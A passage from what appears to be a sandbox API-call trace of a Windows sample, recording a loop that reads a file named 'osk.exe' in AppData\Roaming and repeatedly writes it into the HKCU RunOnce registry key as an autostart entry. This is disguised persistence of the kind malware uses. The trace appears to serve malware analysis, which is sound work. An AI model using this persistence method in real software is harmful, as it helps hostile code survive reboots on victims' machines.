out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.753] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.753] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.753] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.753] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.753] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.754] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 
ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.754] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x49 [0081.754] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.754] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4a [0081.754] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.755] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x49 [0081.755] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.755] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.755] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.755] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.755] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.755] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.755] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.755] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.756] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.756] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") 
returned 0x0 [0081.756] RegCloseKey (hKey=0x280) returned 0x0 [0081.756] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.756] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.756] SetTimer (hWnd=0x20280, nIDEvent=0x20c5, uElapse=0xa, lpTimerFunc=0x0) returned 0x20c5 [0081.756] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.765] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.765] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.765] KillTimer (hWnd=0x20280, uIDEvent=0x20c5) returned 1 [0081.765] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.766] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.766] IUnknown:Release (This=0x787518) returned 0x1 [0081.766] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.766] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.766] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), 
rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.766] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.766] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.766] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.766] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.766] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.766] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.766] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4a 
[0081.766] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.767] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4b [0081.767] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.767] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4a [0081.767] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.768] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.768] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.768] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.768] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.768] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.768] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.768] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.768] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.768] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.768] RegCloseKey (hKey=0x280) returned 0x0 [0081.769] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.769] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.769] SetTimer (hWnd=0x20280, nIDEvent=0x20c6, uElapse=0xa, lpTimerFunc=0x0) returned 0x20c6 [0081.769] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.781] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.781] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.781] KillTimer (hWnd=0x20280, uIDEvent=0x20c6) returned 1 [0081.781] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.781] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.781] IUnknown:Release (This=0x787518) returned 0x1 [0081.781] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.781] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.781] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, 
varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.782] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.782] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.782] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.782] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.782] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.782] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.782] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4b [0081.782] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, 
[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.782] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4c [0081.782] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.783] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4b [0081.783] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.783] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.783] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.783] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.783] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.783] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.783] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.783] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.784] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.784] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.784] RegCloseKey (hKey=0x280) returned 0x0 [0081.784] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.784] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.784] SetTimer (hWnd=0x20280, nIDEvent=0x20c7, uElapse=0xa, lpTimerFunc=0x0) returned 0x20c7 [0081.784] 
GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.796] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.796] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.796] KillTimer (hWnd=0x20280, uIDEvent=0x20c7) returned 1 [0081.797] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.797] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.797] IUnknown:Release (This=0x787518) returned 0x1 [0081.797] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.797] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.797] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, 